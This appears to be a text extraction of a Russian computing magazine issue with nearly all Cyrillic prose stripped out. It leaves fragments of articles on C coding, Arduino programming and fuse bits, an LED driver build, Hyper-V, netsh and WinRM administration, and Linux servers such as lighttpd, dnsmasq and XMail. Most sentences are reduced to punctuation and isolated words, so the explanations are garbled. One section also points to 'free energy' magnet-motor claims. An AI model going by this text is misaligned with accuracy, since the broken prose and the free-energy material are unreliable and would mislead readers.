Services_Gnip_Rule,
:
(, Actor, Regarding, To;
, ).
( , ; , ,
).
,
:
$gnip->createFilter($publisher, $newfilter)

.
( , success). : , .

- ?
, Gnip . ,
. ,
, ;
. , . , Publishers, , ,
RSS-: ,
.
, , . API ,
, ,
web-. Gnip .
.
API RSS,
, ,
Gnip Identification , .

- OpenID.
, . !z

097

>> coding


, , ,
. ,
, , , ,
. -, , -, . -,
, .

01


, , , ,
, .
, , . , . ,
, .
?
static /vars/global/animals/cat;
/pub//demo/foo(int /args/mouse)
{
int /vars/local/animals/dog;
return /vars/local/animals/dog =
/vars/global/animals/cat + /args/mouse;
}

, . : define.
Microsoft Visual C++. ,
,
? , DOS, !
, .
. (
, )
, _ /. ?
ModuleName_FuncName
.
!
, ,
, !

098

,
. , _ /,
.
, win32 API,
(
),
. , . alpha, beta, gamma
,
. ? !
, .
alpha . , ,
, ( alpfa ).
,
.
, .

02

, , !
,
,
a + b add(a, b). ,
. , . .
,
(, ).
, - :
X 02 /122/ 09

>> coding

, . ,
, #define add(a, b)
((a)+(b))
char, int float/double (
, ).
, 64- ,
? , ,
,
128 ,
.
( ,
), ,
.
,
, .
, . , . ASCII- .
. ? ,
? ,
( Pascal-). ,
,
() ;
(,
) .
. , , ,
.
, .
, , ,
. !
. ?
, , . , !

, . , ,
.
. ?
s1 s2? ,
str
substr (,
). ?
, X 02 /122/ 09

-
strcat, .

03

/dev/nul
,
, , .
, ( ReadFile)
( VirtualProtect).
, , :
,
.
.
( ). , ,
.
, .
;).
, , ,
? , : ReadFile(h, buf, 1,
(DWORD*) "XXX", 0), XXX , , . (
),
( , ) XXX . (DWORD*)
, ,
, .
? ? , .
, ,
( ),
.
, (
).
, ,
. - ,
. . , .
, , , . , . . ,
z

099

>> phreaking
DI HALT
/ DI_HALT@MAIL.RU /

AVR


>> ARDUINO
Arduino-.
IT-
- , - .
, ,
, .

, - ! , ,
.
, . USB
PC- , 9-
. , .
, - ,
.
, ? !
, .
, , , , Lego Mindstorm 30 .

, , ,
. Arduino

100

AVR , Mega8
Mega168, .
:
1) ,
. , ,
. , , .
2) LM7805 1425,
. ,
6 12 .

. ,
.
, , RESET
.
3) FT232 , . : UART,
X 02 /122/ 09

>> phreaking

. ,
Arduino

USB- , COM. , FT232 ,


. Arduino
MAX232 COM-. BlueTooth ; , . , FT232 BT-,
UART COM-,
. , .
4) , ,
, . ,
, ,
.
, , .

,
.
, , UART. SPI I2C ,
. USB BlueTooth, ?
, USB , COM: , UART
COM- , . ,
.
BT.
,
, - , , .


AVR GCC, Java. GCC AVR (, ). ,
, Arduino.
,
. , .
, ,
/.
.
, -. , ,
.
, X 02 /122/ 09

.
Terminal v1.9b !
, ,
BootLoader. Bootloader
.


Arduino, . ,
. , , .
, . ,
. ,
.
:
int outputPin = 13;
int val;

, , integer
, 255. outputPin 13.

:
void setup() {
Serial.begin(9600);
pinMode(outputPin, OUTPUT); }

, 9600.
outputPin .
.
, , . main() .
void loop()
{
if (Serial.available())
{
val = Serial.read();
if (val == 'H')
{
digitalWrite(outputPin, HIGH);
}
if (val == 'L')
{
digitalWrite(outputPin, LOW);
}
}

101

>>
>> pc_zone
phreaking




- .
. , - . ,
,
,
.
, Arduino
.
,
, .
, ,
Arduino ,
. GCC
WinAVR. ,
.
-
!

dvd
:
;

;

UniProf.

, , , . ;
, .
Serial.xxx , aka UART.
available , ,
. Serial.read ,
H, , L,
. ! (, 1 +5 )
digitalWrite, ,
.
AnalogWrite AnalogRead, -

arduino.cc Arduino.
avr.nikolaew.org , AVR.
easyelectronics.ru . .
habrahabr.ru/blogs/arduino , Arduino.
linuxcenter.ru Arduino .
freeduino.ru , .

102

ARDUINO ARDUINO
, ,
.
. -!
!
?
:
. 80-100, USB- FT232RL

, : Arduino
,
,

.

.
, ,
,
COM-.
, ,
- .
X 02 /122/ 09

>> phreaking

UniProf
MAX232
COM-. 5 ,
, .

, .
burn.bat, . :
tools\avr\bin\uisp -dpart=ATmega8 -dprog=stk500 -dserial=com1
-dspeed=115200 --wr_fuse_l=0xdf --wr_fuse_h=0xca

, - . Arduino,
. 150 ! 250, USB- FT232.
, Bootloader.
, , Arduino
,
RS232 ( ). ? !
, Arduino .
, ,
COM-.
, , , ,

Flash- . ,
.
, ,
. .
, , , , , .
! , , ? ,
AVR ,
LPT-. LPT,
COM .
avr.nikolaew.org
. COM, LPT,
. , , .

BOOT AVR
.
ATmega168: ( , ,
Arduino).
. Mega8. ,
Arduino, hardware/bootloaders. ,
( ).
hex !
, ,
uniprof . ,
.
Hex, ,
,
Prog. , . ,
hex-.
fuse bits, .
. Fuse bits ,
! , .
X 02 /122/ 09

, wr_fuse_l=0xdf wr_fuse_h=0xca?
Fuse bit. wr_fuse_l
, wr_fuse_h .
.
! , .
Fuse, ( )
Read, Fuses.
Fuse (low) Fuse (High) . uniprof
fuses . , ,
, . Mega8:
Low Fuse 0xDF = 1101 1111
1 = Cksel0
1 = Cksel1
1 = Cksel2
1 = Cksel3
1 = Sut0
0 = Sut1
1 = Boden
1 = Bodelevel
High Fuse 0xCA = 1100 1010
0 = Bootrst
1 = Bootsz0
0 = Bootsz0
1 = Eesave
0 = CKOPT
0 = SPIEN
1 = WDTON
1 = RSTDSBL

168 , . Fuse .
. .
Tools
COM-, , ,
( Mega8 Mega168).
Arduino- !

RETI
, , ,
. ,
, ,
, . ! z

103

>> phreaking
DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /


>>
youtube ,
, .
, ,
, ,
. - .


, . ,
:
multiple , reduce ... ( \).

, -
, ,
. ,
.
? , . ,
.
, , ,
.

104

?
2 7070 ( ,
, , ,
.
);
( 488
. , .
-);
( , );
( . );
;
(, );
2 5 ( 20.
, );
, ;
( );
(1 );
10 ;
(
X 02 /122/ 09

>> phreaking

, !

, );

, . ,
, . , ,
,
.
.
500 .



. ! ,
.

. , .
,
, ,
. , ,
, 40 (
10 . .). ,
, .
:

888 ( 5 );
844;
535;
555 ( 2 );
;
.


,
. 12v, - . , ?
. .
---.
,
X 02 /122/ 09


(7-) , .
:
,
.
. ,
, , , , :).

105

>>
>> pc_zone
phreaking

dvd


, ,
,
.

,
. !
, (
12 ) NEO
,
.
. ,
, .

,

- ,
. ,
- . , .

.
. , ,
.
:). ,

. - .


, .
, ,
.
.
, ,
.

106

.
, .
,
, .

?

, (
)
(John Searl), 1939 , ,
.
,
.
, , , , .
100 \ , 1000
\
.

.
:
http://www.manwb.ru/articles/science/natural_
science/john_searl
http://peswiki.com/index.php/Directory:Searl_
Effect_Generator_%28SEG%29
http://peswiki.com/energy/Directory:Magnet_Motors
http://peswiki.com/index.php/Directory:OC_MPMM_
Magnet_Motor
X 02 /122/ 09

>> phreaking

. 1

. 2

. !

. - .
, . ,
, ,
.
, , .

,
, , .
, 200 ,
X 02 /122/ 09

. . , , , ,
, ,
, . , ,
,
. , .

. ,
( ),
20% ( http://www.ntpo.com/physics/studies/22.shtml).
: ! z

107

>> phreaking
DARK SIMPSON
/ HTTP://DARK-SIMPSON.
LIVEJOURNAL.COM /

>> ,
. ,
, , , .
. ,
, .

, . : , , , , ,
, ,
( ). , . , .
, : !
, : , . ,
, , ,
( -,
) .
, ,
( , ,
, ?).

, -. ,
,
, .
, , , , : -
( ,

108

); - ( ),
- , (, , ,
-). , .
, , , ,
, , .
(
, ,
, ). , , .
: If there were no God, it would be necessary to invent him,
. , , -.
,
: ,
,
. , ,
. ,
, . , . ,
, .
, , ,
. !

: ,
, , .
( , ) - .
X 02 /122/ 09

>> phreaking

SOT-23

, , ,
. -. ,
- ,
, ,
, , ,
(, , , ). , , ,
.
(
),
, AA,
, .
,
.
( ,
; ?). 120- (
, ,
; , ).
, , SMD-.
, , , . ,
- .
, ,
AA, AAA ( ). , , ,
, , .

!
, , - . , ,
3 . ,
3 - , , 1,5 , . ,
X 02 /122/ 09

, ,
! ,
? - . - , , :
6 , , , !
, .
( , ), .
(boost step-up converter).
, ZXLD381.
, ,
() ,
. ,
,
.


, . 20
( ).
,
. ,
, , , ,
.
, ? . ,

, ,
( ), ,
.
.

, . ,
,
. ,
, , . ,
,
, . ,
, , ,
, , .
300 ,
, .
,
,

109

>>
>> pc_zone
phreaking
, .


.
,
, boost converter,
,
, . ,
4,7 ,
, ,
, ,
.

dvd




2 (

0),

ZXLD381.

.
, , 20 .
, .
. , 3
4 , 1,8.
.


. .
, .

, . , ,
, (
),
.

,
.
. ,

, , .
,
, (
, ,
, ).
, .

, .
,
, ,
(
,
). 4 , ,
, -
(, ). , . ,
.

110

,
, .
( ),
( , ;
, ), ,
. ,
! ,
,
! , ( ,
, ). ,
, , ( ,
,
10-12).

( ),
, ,
:
1. (, 120
) 8 ;
2. SMD 0805, 4.7* 4 ;
3. SMD 1206, 0 2 ;
4. SMD 1206, 3.3* 2 ;
5. SMD A, 1 2 ;
6. BAT54 ( !) 2 ;
7. ZXLD381 2 ;
8. 2 ;
9. .
,
-, (www.
terraelectronica.ru).
( ,
), .
.

X 02 /122/ 09

>> phreaking

, , ,
. , ,
( , ).
,
.
( ).
, ,
. , ,
( ).
350 , ,
,
.

-. , . - ,
SMD- ( , , !),
. ,
,
.
.
( ),
(, ,
, ). ,
, ;
--, ,
X 02 /122/ 09

, .
, , . , ?
, .
? ()
, . , .


, .
, , : , ,
( , step-down, , ,
z 116).
( ,
) !
ZETEX (www.zetex.com),
NiCd-NiMH
(1.2-1.5 ). MAXIM (www.maxim-ic.com), ON
(www.onsemi.com) LT (www.linear.com)
( ,
, ), . , ,
3-4 , 5-
AAA ( , ,
, , ). :
- -, ,
... ,
. , , () ! . z

111

>> SYN/ACK

/ CORE@SYNACK.RU /

HYPER-V: WINDOWS SERVER 2008

. Win2k8 Hyper-V, .
HYPER-V

. ,
, .
VMware,
( ) .
,
.
10% , .
Microsoft Connectix
Microsoft Virtual PC.
, ,
Virtual PC . ,
(,
), . ,
, ,
, . VMware Player,

112

, . EasyVMX (www.easyvmx.com),
,
VMware Player. , Microsoft
, .
Hyper-V Win2k8,
beta3- Hyper-V. 180 Win2k8,
, . 64- Win2k8 Standard/Enterprise/
Datacenter (Web Itanium ) Microsoft Hyper-V Server 2008.
CAL (Client Access License);
Windows. Hyper-V ( ), Server Core.
X 02 /122/ 09

>> SYN/ACK

Hyper-V
, Hyper-V, Win2k8 . , Hyper-V Server 2008, ,
Win2k8 Standard,
, . . ( ), , Server Core. (
Standard) 4 32 .
128 VM,
,
.
VM, . Standard
VM, Enterprise 4; VM
Datacenter .
:
. , , , 32-
( , x86
; , , , 4 ).
64- , Intel VT
AMD-V ( Pacifica). BIOS
(Intel XD AMD NX).
Ring-1 , , Hyper-V
. (
1 ) .
X 02 /122/ 09

(CPU, RAM, I/O).


Hyper-V (Parent Partition)
( , Child Partition). .
Parent Partition. Hyper-V :

113

>> SYN/ACK

info

Hyper-V
Viridian.
,


.


,
,

.
VT (Intel
Virtualization
Technology)

,
Intel. AMD


AMD-V, (
Intel VT)

( 8086).
HyperV

32 64
Windows,
XP Professional SP2
Win2k8
(
Windows HPC Server
2008), SUSE
Linux Enterprise
Server 10 SP1.
Home .

114

, - Hyper-V
24;
1 , RAM, 128 RAM; . 192 - , .
, , VM
512;
.
32- 64- , Hyper-V (www.
;
microsoft.com/servers/hyper-v-server).
VLAN 4096 Microsoft, ; VM 12 - WinXP Pro SP2.
SUSE Linux Enterprise Server 10 SP1
;
VM 4 , (, , Novell Microsoft). Hyper-V
2040 ;
- Linux- Debian, Ubuntu, Mandriva.
. FreeBSD.
, HYPER-V
.
Hyper-V Volume Shadow Copy Service (VSS). - ,
: . - Hyper-V.
16, - Start Control Panel
128. - Windows Update, View update history, ,
24 192, KB956710 . Server Core
wmic qfe list. (support.microsoft.com/kb/956710).
- , Microsoft . , Win2k8 Standard Hyper-V Server . , KB956710,
32 RAM. Win2k8 KB950050.
Standard 1,2 4 CPU, 2k3/Vista 1 2, . ,
1. , Hyper-V . Hyper-V -

Hyper-V
Hyper-V
,
Windows ( )
:
Ctrl + Alt + End (Ctrl + Alt + Del) Windows;
Alt + Page UP (Alt +Tab) ;
Alt + Page Down (Alt + Shift + Tab)
;

Alt + Insert (Alt + Esc)


;
Alt + Home (Ctrl + Esc) ;
Ctrl + Alt + Pause
;
Ctrl + Alt + Left Arrow .
Hyper-V
Server Settings.
X 02 /122/ 09

>> SYN/ACK

Win2k8.
, , Microsoft
KB951636 Hyper-V Language Pack (support.microsoft.com/
kb/951636), .
: x86 x64 . Windows Server 2008 MUI Language Pack,
. . img- (
, Lp.cab), Regional and Language
Options Keyboards and Languages,
Install/uninstall languages .
(Server Manager)
, (Add Roles). Select Server Roles, Hyper-V Create Virtual Networks.

,
.
,
. , ,
Install. , , , BIOS Intel VT
( AMD-V ).
,
. .
.
X 02 /122/ 09

-
Resume Configuration Wizard.
Hyper-V Server Core
( ,
z 2008 ) :
> start /w ocsetup Microsoft-Hyper-V

Hyper-V,
Hyper-V Tools. Hyper-V
Win2k8,
(Features) Add Features. ,
Hyper-V (Remote Server Administration Tools Remote Administration
Tools Hyper-V Tools).

HYPER-V
Hyper-V Win2k8 Hyper-V (Hyper-V Manager),
. ,
MMC , . Server
Manager, Administrative Tools.
Hyper-V .
. Hyper-V, . , , .

115

>> SYN/ACK

links
VMware Player
EasyVMX: www.easyvmx.com.

Hyper-V:
www.microsoft.com/
servers/hyper-v-server
www.microsoft.com/
virtualization
blogs.technet.com/
abeshkov
hyper-v.ru

warning
Hyper-V
64- .

, VM.
.
, Connect to Server,
.
Hyper-V Server Settings . ,
.
, , .
.
(<Alt+Tab>),
(<Ctrl+Alt+ >) .
(,
Virtual Server),
Hyper-V. Import Virtual
Machine, , .
, .
,
.


Hyper-V VM VM
:
External () ,

, , ;
Internal ()
, , .
,
;
Private ()
, , .
,

Hyper-V
Hyper-V Win2k8, . support.microsoft.com/kb/952627 Vista SP1. : System
Center Virtual Machine Manager (SCVMM) 2008,

. ,
System Center.
SCVMM Microsoft Virtual Server VMware ESX.
,
(, , ).
120- SCVMM :
www.microsoft.com/systemcenter/virtualmachinemanager.

116

Virtual Network Manager.


, , Hyper-V . Name

Notes,
. , External (,
, ). ,
Connection Type . ,
VLAN- ().
Remove
. ,
New virtual network, , Add, .
Hyper-V
:
, ;
SAN (Storage area network), Internet SCSI (iSCSI),
Fibre Channel SAS;
NAS (Networkattached storage) ,
Ethernet.

, ( .vhd).

VM. , New Hard
Disk .
Choose Disk Type
. Dynamically
expanding,
. ,
. Fixed size
.
,
.
, , , , , .
. Hyper-V
Differencing,
. .
.
.
, Hyper-V (
LUN (logical unit number) SAN-).
( Offline Disk
Management!),
. ,
Dynamically expanded Differencing.

, .
X 02 /122/ 09

>> SYN/ACK

Configure Disk. Copy the contents of the specified


physical disk, . . . Hyper-V
Edit Disk . Choose Action
, , ,
(Dynamic Fixed) .
,
-,
.
, . New Virtual Machine
New Virtual Machine Wizard. , VM , , . Assign
Memory , VM (
, ). ,
VM. . Installation Options , .
CD/DVD-, ISO-,
( ) PXE-. VM, Finish.
VM . , , Cancel;
Finish , , ,
VM . VM , Start. VM, , ,
Settings.

Hyper-V , .
64- . , ,
,
. z
X 02 /122/ 09

117

>> SYN/ACK

- IIS (Web-Server)
- (Web-WebServer)

Web-Server ,
IIS, ASP, ASP.NET, CGI, Web Security .
Web-WebServer
.
, '-whatIf' ( ).
, Id,
/, (
). , ,
'-restart' ServerManagerCmd. .
, '-allSubFeatures/-a'.
Id :
> servermanagercmd remove Web-Server restart
resultPath result.xml

'resultPath/-rp' , . 'install' '-remove' .


/
'-inputPath' XML- ( '-query').
, ServerManagerCmd Server Core , Server
Manager .

NETSH
Netsh (network shell) , ,
Windows, . Netsh Win2k
Cisco ( Microsoft Cisco Systems
).
, ,
WFAS (Windows Firewall with Advanced Security), . ( ,
) . ,
, Netsh
. DLL, Windows , Netsh
Win2k8 .
X 02 /122/ 09

Netsh

, CMD.exe netsh /?.


( Win2k8 15, ), . , interface,
netsh interface /?.
, , . ,
netsh , netsh>, , . , : ... ,
Netsh : (online)
(offline). online , . offline , ,
commit ( flush)
online-. , Netsh,
show mode.
online offline. , :
netsh> interface
netsh interface> show interface

interface
dump, :
> netsh interface dump > C:\interface.txt
> more C:\interface.txt

.
, 'f'.
Netsh
(alias), . ,
showip, IP- :
netsh> alias showip interface ipv4 show ipaddresses

:
netsh> showip

IP- , show set:


netsh> interface ipv4 set address name=" , showip" static 192.168.0.10
255.255.255.0 192.168.0.1

119

>> SYN/ACK
GRINDER
/ GRINDER@UA.FM, TUX.IN.UA /


WIN2K8

Windows,
, ,
,
.
,
, .

(Server Manager), Win2k8,
Computer Management Win2k3.
, . Server Manager,
ServerManagerCmd.exe, . ,
, ,
-query/-q:
> servermanagercmd -query
[x] - <IIS> [Web-Server]

. .
XML,
:

118

> servermanagercmd -query c:\Query.xml

:
<Role
DisplayName="DHCP-"
Id="DHCP" />

Installed="false"


[command-Id].
/,
. ,
. :
> servermanagercmd install FS-FileServer

Id. , ,
:
X 02 /122/ 09

>> SYN/ACK

- Netsh

IP- 192.168.0.10
192.168.0.1. :
netsh> interface ipv4 set address Local Area Connection
source=dhcp

set add,
IP-:
netsh> interface
255.255.255.0

ipv4

add

address

234.234.234.234

,
Netsh. ,
platformlabs.com/bag/net.htm
IP- .
Netsh ,
. 'r' ( set machine), WINS/UNC/DNS- IP-.
'' ,
, 'p' :
> netsh -r Win1 \\test server.ru -u administrator -p
MyPassw0rd showip

,
WINS/UNC/DNS-.
.
, . WFAS.

WFAS NETSH
advfirewall firewall Win2k8 . WFAS
: (Domain), (Private) (Public). , :
netsh> advfirewall show allprofiles
netsh> advfirewall show currentprofile

firewall ( advfirewall firewall)


. WFAS :

120

netsh> firewall show rule name=all

, , .
, (/), , , /
. ,
.
add rule. , VNC- (
5900 5906):
netsh> firewall add rule name="Block In VNC" dir=in
localport=5900-5906 action=block

, ,
. , name
( , all ). , . , , name="Block In
VNC", localport. ( ) dir=in|out.
action=allow|block|bypass ( ).
, : (program=_
), (service=_), (localip) (remoteip) IP-, (interfacetype),
(protocol) . delete.
, dump . .
netsh firewall set.
, , :
netsh> firewall set opmode disable

, , disable enable.
netsh, :
netsh> firewall set portopening 80 "-"

(mode=ENABLE).
, mode=DISABLE.
IP- :
X 02 /122/ 09

>> SYN/ACK
netsh> firewall set portopening 110 "
POP3 " CUSTOM 192.168.0.0/24

110
192.168.0.0.
, / set
allowedprogram. set logging WFAS.

WINRM
Vista, Win2k3 R2 Win2k8
,
Windows.
WinRM (Windows
Remote Management) WinRS (Windows
Remote Shell).
, WinRM
,
, .
80/443 (HTTP/S), . IIS, ,
WinRM .
Windows WMI (Windows Management
Instrumentation).
Win2k8 WinRM , . :
> winrm enumerate winrm/config/Listener
> winrm quickconfig

, . y,
WinRM
Windows Firewall. ,
Listener.
WinRM
winrs, '-r' , . :
winrs -r:[http|https://]"ServerName":
Domain\Username p:Password

u:

Win2k8, ,
.
, ipconfig
DHCP DNS.
, WinRM
. '/all' .
DNS- '/
displaydns'. :
, , .
DNS-, :
> ipconfig /flushdns

WFAS .
netstat. ,
:
a (TIME_WAIT);
n
;
b ,
;
o .

:
> netstat -anbo
UDP 0.0.0.0:123 *:* 1024 W32Time [svchost.exe]

,
, .

find,
:
> netstat anbo | find "LISTENING"

http,
. ipconfig :
> winrs ipconfig


server.com 80- :
> winrs -r:server.com ipconfig


<Ctrl+C> <Ctrl+Break>.
WinRM :
> winrm delete winrm/config/listener?IPAdress=
*+Transport=HTTP
X 02 /122/ 09

, ,
fc. , :
> netstat a > netstat-01.12.08.txt
> netstat a > netstat-01.01.09.txt
> fc netstat-01.12.08.txt netstat-01.01.09.
txt

tasklist .
,
PID:
> tasklist /SVC /FI "PID eq 1024"

( '/SVC'), , 1024. z

links


ServerManagerCmd

Server Manager
Technical Overview
Appendix,
TechNet technet.
microsoft.com/en-us/
library/cc875805.aspx.

platformlabs.com/
bag/net.htm -

IP-
.

info



Windows Server 2008
.
WinRM
80 443 .

cmd.
exe


X_05_2007 (www.
xakep.ru/magazine/
xa/101/154/1.asp).

121

>> SYN/ACK
GRINDER
/ GRINDER@UA.FM, TUX.IN.UA /

, ,
Apache, Squid, BIND, Postfix, Courier Mail Server. . , , .
- LIGHTTPD
Apache, , , - -.
, . Debian/Ubuntu sudo apt-cache search
httpd . nginx (nginx.
net) lighttpd (www.lighttpd.net), , NetCraft
(netcraft.com), -.
, ,
I/O. , lighttpd , SourceForge, Youtube,
. ( FastCGI) . / . , ,
. lighttpd PHP5
MySQL.

122

: -
Ubuntu ( , Ubuntu
8.04 LTS, , , , ):
$ sudo apt-get install lighttpd lighttpd-doc php5-cgi

, . , http://localhost,
, . /etc/lighttpd, DocumentRoot /var/
www, CGI- /usr/lib/cgi-bin, /var/log/
lighttpd. ,
cgi.fix_pathinfo (
PHP SCRIPT_FILENAME):
$ sudo nano /etc/php5/cgi/php.ini
cgi.fix_pathinfo = 1
X 02 /122/ 09

>> SYN/ACK

-, Lighttpd

Lighttpd + PHP + MySQL


lighttpd.conf Unix.
,
. :
$ sudo nano /etc/lighttpd/lighttpd.conf
#
server.modules = (
"mod_access",
"mod_alias",
"mod_accesslog",
"mod_compress",
# , FastCGI
"mod_fastcgi",
# "mod_rewrite",
)
#
server.document-root = "/var/www/"
# , index.php
index-file.names = ( "index.php", "index.html",
"index.htm", "default.htm", "index.lighttpd.html" )
# ,
# server.port = 80
# server.bind = "localhost"
#
dir-listing.encoding = "utf-8"
# UID|GID,
server.username = "www-data"
server.groupname = "www-data"
# - PHP-
fastcgi.server = ( ".php" => ("bin-path" => "/usr/bin/
php5-cgi",
"socket" => "/tmp/php-fastcgi.socket"
))

:
$ lighttpd -t -f /etc/lighttpd/lighttpd.conf
Syntax OK

:
$ sudo /etc/init.d/lighttpd force-reload

MySQL:
$ sudo apt-get install php5-mysql mysql-server mysqlclient
X 02 /122/ 09

, PHP,
php-imap, php-gd, php-ldap .
Perl- lighty-enable-mod, lighty-disable-mod,
. , fastcgi:
$ sudo lighty-enable-mod fastcgi
Available modules: auth cgi fastcgi proxy rrdtool simplevhost ssi ssl userdir
Already enabled modules:
Enabling fastcgi: ok
Run /etc/init.d/lighttpd force-reload to enable changes

DELEGATE
- *nix . ,
. : , ,
. Squid . , Polipo (www.pps.jussieu.fr/~jch/software/
polipo) ,
, Oops! (www.oops-cache.org).

, Tinyproxy (www.banu.com/tinyproxy)
3proxy (3proxy.ru). web-? WillowNG (launchpad.net/willowng), bfilter (bfilter.sf.net),
WebCleaner (webcleaner.sf.net). DeleGate (www.
delegate.org). . (HTTP, FTP, NNTP, SMTP, POP, IMAP, LDAP, Telnet,
SOCKS, DNS). , , . DeleGate Ubuntu, .
( e-mail).
:
$ tar xzvf delegate9.9.0.tar.gz
$ cd delegate9.9.0
$ make

email-, .
$HOME/delegate DGROOT-, . pid-, .
delegated , PATH:

123

>> SYN/ACK

DeleGate, e-mail

$ sudo cp -v src/delegated /usr/bin

delegate http-,
8080 (-v ):
$ delegated -v -P8080 SERVER=http

.
. <1024, Delegate
root. -v,
. :
$ delegated -P8080 -Fkill
"/home/user/delegate/act/pid/8080": kill(14131,SIGTERM)
= 0 (0) ** OK **

Delegate :
$ delegated -P192.168.1.1:8080 SERVER=http CACHE=do

delegated , ,
Delegate , . FTP:
$ delegated -P8021 SERVER=ftp

, Delegate HTTP, FTP, DNS NNTP-. , -:


$ sudo delegated -P80 SERVER=http MOUNT="/* file:/var/
www/*"

DeleGate HTTP-

DNS DHCP- . DNS DHCP , -


, ,
. , DHCP IP- DNS-. Dnsmasq
/etc/hosts, DNS,
DHCP. IP hosts. :
$ sudo apt-get install dnsmasq

Dnsmasq /etc/
dnsmasq.conf. , :
listen-address=127.0.0.1, 192.168.0.1

, interface.
/etc/resolv.conf
nameserver 127.0.0.1, ,
.
IP- DHCP, /etc/resolv.conf . , /etc/
dhcp3/dhclient.conf :
prepend domain-name-servers 127.0.0.1;

resolv.conf
127.0.0.1. IP- DNS-.
dnsmasq:
$ sudo /etc/init.d/dnsmasq restart

DNS DNSMASQ
DNS- . BIND , DNS-. . sudo
apt-cache search dns .
, lwresd , , ,
BIND 9, DNS. PowerDNS
DNS-,
; MaraDNS ;
djbdns; Dnsmasq, , .
Dnsmasq (www.thekelleys.org.uk/
dnsmasq) DNS, DHCP TFTP-.

124

DHCP- dhcp-range, IP- :


dhcp-range=192.168.1.100,192.168.1.150,255.255.255.0,2
4h

192.168.1.100-192.168.1.150. , Dnsmasq , .
, DNS- IP- .
,
, X 02 /122/ 09

>> SYN/ACK

XMail

. ,
, dhcp-.
DHCP. , MAC-
IP-,
dhcp-host:
dhcp-host=00:11:AA:BB:22:
CC,192.168.1.200,dejavu

, dhcp-host .
, ,
ignore.

XMAIL
(1.5 ) XMail (www.
xmailserver.org) SMTP, POP3 Finger,
: Linux, *BSD, Mac OS X, Solaris Windows NT/2000/
XP/2003/Vista.
, . , POP3
, , ,
.
, Sendmail/Postfix/Exim
.
Ubuntu:
$ sudo apt-get install xmail xmail-doc


. XMail /var/
lib/xmail ( /var/Mailroot), /
var/spool/xmail . Debian/
Ubuntu /etc/xmail,
.
.
/etc/
init.d/xmail. README,
, /usr/share/doc/
xmail. .
. ,
(
, ; <Enter>,
).
X 02 /122/ 09

XMail PHPXmail

netstat -atn, , , 25 (SMTP) 110 (POP3) . . XMail


, . ,
mailusers.tab,
smtpauth.tab SMTP- ( ). ,
, pop3.ipmap.
tab smtp.ipmap.tab. :
"0.0.0.0" "0.0.0.0" "ALLOW" 1

,
:
"0.0.0.0" "0.0.0.0" "DENY" "1"
"192.168.1.0" "255.255.255.0" "ALLOW" "2"

SMTP- ,
, .
. XMail
( 6017).
XMail Tools
. , PHP- XMail PHPXmail (phpxmail.sf.net). ctrlaccounts.tab
.
. XMCrypt :
$ sudo /usr/sbin/XMCrypt p@5sw0rd
1525501612551701

ctrlaccounts.tab . : admin 1525501612551701.


, ctrl.ipmap.tab
, *.ipmap.
tab. , /var/www
PHPXmail http://localhost/
phpxmail. Add new server, .
-,
. /var/log/xmail.
: ctrl* , smtp* pop3 . z

links
:
Nginx nginx.net
Lighttpd www.
lighttpd.net
Thttpd www.acme.
com/software/thttpd
Dnsmasq www.
thekelleys.org.uk/
dnsmasq
Oops! www.oopscache.org
DeleGate www.
delegate.org
XMail www.
xmailserver.org
PHPXmail
phpxmail.sf.net

info

lighttpd

,
SourceForge, Youtube,
.
- Squid
,

z 2008 .
LAMP
,

z_12_2008.

125

>> SYN/ACK

/ ANDRUSHOCK@REAL.XAKEP.RU /

/ CORE@SYNACK.RU /


*NIX


. . , .
NITRAF
Net-Acct (exorsus.net/projects/netacct)
.
, netacct-mysql
(netacct-mysql.sf.net), MySQL
PostgreSQL. (, Sawmill www.sawmill.net/
formats/net_acct.html) .
NiTraf (nitalaut.sarkor.uz),
IP-.

. MySQL
-.
Net-Acct, MySQL
Apache2. Ubuntu/Debian :

126

$ sudo aptitude install net-acct mysql-server \


python-mysqldb apache2
apache2-utils

MySQL-:
$ mysql -uroot -ppassword
> CREATE DATABASE trafdata;
> USE trafdata;
> GRANT ALL ON trafdata.* TO traf@localhost IDENTIFIED BY
'trafadmin';
> QUIT;

NiTraf /opt/trafdata/raw, Net-Acct


.
:
X 02 /122/ 09

>> SYN/ACK

PHP - vnstat
vnstat
$ sudo ./settings/checkquota.py
$ sudo mkdir -p /opt/trafdata/raw

, /etc/crontab :

Net-Acct. /etc/naccttab:

*/10 * * * * root cd /etc/nitraf; ./rawtraf.py


*/5 * * * * root cd /etc/nitraf/settings; ./checkquota.py

$ sudo nano /etc/naccttab


# ,
file /opt/trafdata/raw/net-acct.log
dumpfile /opt/trafdata/raw/dump
debugfile /opt/trafdata/raw/net-acct.debug
# , ,

notdev eth1
#
#device eth0
#
#iflimit eth0
#
ignoremask 255.255.255.0
# loopback- (
)
ignorenet 127.0.0.0 255.0.0.0
# ( )
disable 7

, -.
traf :

:
$ sudo /etc/init.d/net-acct restart

$ sudo nano /etc/apache2/sites-available/traf


<Directory "/var/www/traf/">
Options Indexes MultiViews FollowSymLinks ExecCGI
AllowOverride All
AddDefaultCharset CP1251
</Directory>

:
$ sudo a2ensite traf

- , Apache
:
AddHandler cgi-script .cgi
LoadModule cgi_module /usr/lib/apache2/modules/mod_cgi.so

:
$ sudo a2enmod mime
$ sudo a2enmod cgi

NiTraf :
-:
$ tar xzvf nitraf-20070320.tar.gz
$ sudo mv -v ./nitraf/nitraf /etc
$ sudo mv -v ./nitraf/traf /var/www

/etc/nitraf/mysql/create_mysql_tables.py : LAN=
'192.168.1.'. :
$ sudo /etc/nitraf/mysql/create_mysql_tables.py

, :
$ cd /etc/nitraf
$ sudo ./rawtraf.py
X 02 /122/ 09

$ sudo /etc/init.d/apache2 force-reload

, . .htaccess,
:
$ sudo htpasswd -c /var/www/traf/.htaccess username

. ,
.htaccess. http://localhost/traf .

ULOG
Linux Netfilter, .

127

>> SYN/ACK

- vnstati vnstat

info
Ulogd iptables,


,
iptables
ULOG, MySQL/
PostgreSQL.
Ubuntu

iptables
UFW (/etc/ufw),
.

Asterisk

,
z 2008
.
NeTAMS ,


z 2007 .

2000 Harald Welte , IPCad


ULOG (Userspace Logging, www.
netfilter.org/projects/ulogd), Netfilter . iptables -A FORWARD $FILTER -j ULOG --ulog ULOG
prefix "FORWARD"
ulogd, ulog-acctd, specter scanulog, Webfwlog Nulog2.
, iptables
ulogd , , , , . - .
, MySQL/PostgreSQL. Ubuntu - :
, ulogd. :
$ grep -i ulog /usr/src/linux/.config
$ sudo aptitude install ulogd ulogd-mysql
CONFIG_BRIDGE_EBT_ULOG=m
CONFIG_IP_NF_TARGET_ULOG=m
1.23,
